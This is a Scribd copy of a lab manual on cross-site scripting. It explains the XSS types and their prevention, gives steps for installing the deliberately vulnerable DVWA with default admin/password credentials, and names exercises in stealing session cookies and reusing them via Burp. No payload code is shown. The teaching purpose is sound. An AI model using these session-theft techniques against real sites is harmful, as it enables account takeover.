Scribd
Upload
8 views9 pages

Understanding and Mitigating XSS Attacks

The document provides an overview of Cross-Site Scripting (XSS) attacks, detailing their types (Stored, Reflected, and DOM-based) and methods of execution. It outlines prevention strategies such as input validation, output encoding, and the use of security libraries. Additionally, it includes instructions for installing and configuring the Damn Vulnerable Web Application (DVWA) for educational purposes in cybersecurity training.

Uploaded by

preethi04nov
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
8 views9 pages

Understanding and Mitigating XSS Attacks

The document provides an overview of Cross-Site Scripting (XSS) attacks, detailing their types (Stored, Reflected, and DOM-based) and methods of execution. It outlines prevention strategies such as input validation, output encoding, and the use of security libraries. Additionally, it includes instructions for installing and configuring the Damn Vulnerable Web Application (DVWA) for educational purposes in cybersecurity training.

Uploaded by

preethi04nov
Copyright
© All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd

Advanced Cyber

2. Cross-site Scripting (XSS)


Objective: To learn about XSS attacks and how to mitigate them.
Tools: DVWA
What is XSS?
Cross-Site Scripting (XSS) is a type of security vulnerability commonly found in web
applications. It allows attackers to inject malicious scripts into content that other users will see.
This can lead to a variety of harmful outcomes, such as stealing session cookies, redirecting users
to malicious sites, or defacing web pages. Here are the main types of XSS attacks:

1. Stored XSS: The malicious script is permanently stored on the target server, such as in a
database, and is served to users who visit the affected page. For example, if a user posts a
comment containing a malicious script, and this comment is displayed to others, it’s a stored XSS
attack.

2. Reflected XSS: The malicious script is reflected off a web server, usually via a URL or request
parameter. This type of XSS is often used in phishing attacks. The malicious payload is sent to the
server and then immediately reflected back to the user's browser.

3. DOM-based XSS: The vulnerability exists in the client-side code rather than on the server. In
this case, the malicious script manipulates the DOM (Document Object Model) of the page,
potentially altering how content is displayed or how the page interacts with the user.

# How XSS Attacks Work


1. Injection: The attacker injects a malicious script into a web application.
2. Execution: The injected script is executed in the context of the victim’s browser, often with
the same permissions as the user.
3. Impact: The script can perform actions such as capturing sensitive data, manipulating the
user’s view of the site, or redirecting the user to malicious sites.

# Preventing XSS
1. Input Validation: Ensure all user inputs are validated and sanitized. Reject or encode
dangerous characters before storing or processing user input.
2. Output Encoding: Encode data before rendering it on web pages to prevent it from being
executed as code. For example, use HTML entity encoding to display user input safely.
3. Use Security Libraries and Frameworks: Many modern frameworks and libraries include built-
in protection against XSS. Utilize these tools to mitigate risks.
4. Content Security Policy (CSP): Implement a CSP to restrict the sources from which scripts
can be loaded and executed. This helps to minimize the impact of XSS attacks.
Staying informed about best practices and continuously reviewing and testing your applications
are crucial steps in maintaining security against XSS vulnerabilities.

[Link] CSE- Pag


CY, e
Advanced Cyber

TOOL DVWA: DVWA, which stands for Damn Vulnerable Web Application, is a deliberately
insecure web application designed to be used for educational and training purposes in the field of
cybersecurity and ethical hacking. Created to provide a safe and controlled environment for
learning about web application vulnerabilities and practicing penetration testing techniques,
DVWA is not intended for use in production environments.

Installation of DVWA
Required Kali Linux, MySQL, Web Server Apache

Step1: Download DVWA goto browser Google and type DVWA github then copy
URL [Link]
Step2: Goto terminal to download DVWA on local system and change the directory to run all
web application

The default directory of web server


Step3: if you’re already a root user then no need to give sudo, otherwise provide the sudo at the
beginning of the DVWA git link

Step3: Change the downloaded DVWA into executable, give all the permission

[Link] CSE- Pag


CY, e
Advanced Cyber

[Link] got the default configuration, just create the copy of this file with .php in
future if have any issues then copy of the default values will be available

Step4: Open config file using (nano[nano [Link] edit ctrl O to save and ctrl x] or
vi editor) and hit enter

Step5: After opening the config file, make changes with dbuser=admin, dbpassword=password,
save and close the file

Step6: Configure the database- first start the mysql (service mysql start)

[Link] CSE- Pag


CY, e
Advanced Cyber

U-user default user name of sql is root


Step7: Login is done, after that fill the database

Create the user: The user name and password should be same as config file and [Link] is the
loop back address

Provide the previleges to this user

Then provide exit and clear the screen

Step8: Configure and start web server (or use this command to start service apache2 start )

Step9: Configure the server with php file

[Link] CSE- Pag


CY, e
Advanced Cyber

Make the changes with php file with editor (or you can also use gedit [Link])

The fopen and include should be on condition

Step10. Restart the apache2 server (or use this command to start apache service apache2 start)

[Link] CSE- Pag


CY, e
Advanced Cyber

Step11: Goto browser and type url as [Link]\DVWA


Set the DVWA For the first time when it is used click on create

Provide username as admin and password as password


Next click on create/open db, and login again

[Link] CSE- Pag


CY, e
Advanced Cyber

Example: XSS Reflected

Example: Get cookies information: Session ID( Using Burp you can login to account without
credentials) with low security level.
Try with different security level- medium, high

[Link] CSE- Pag


CY, e
Advanced Cyber

Stored: Example 1)

Example 2) Malicious script

[Link] CSE- Pag


CY, e
Advanced Cyber

DoM: no text box is available ,only we can use here is url

Ref link: [Link]


[Link]

[Link] CSE- Pag


CY, e

You might also like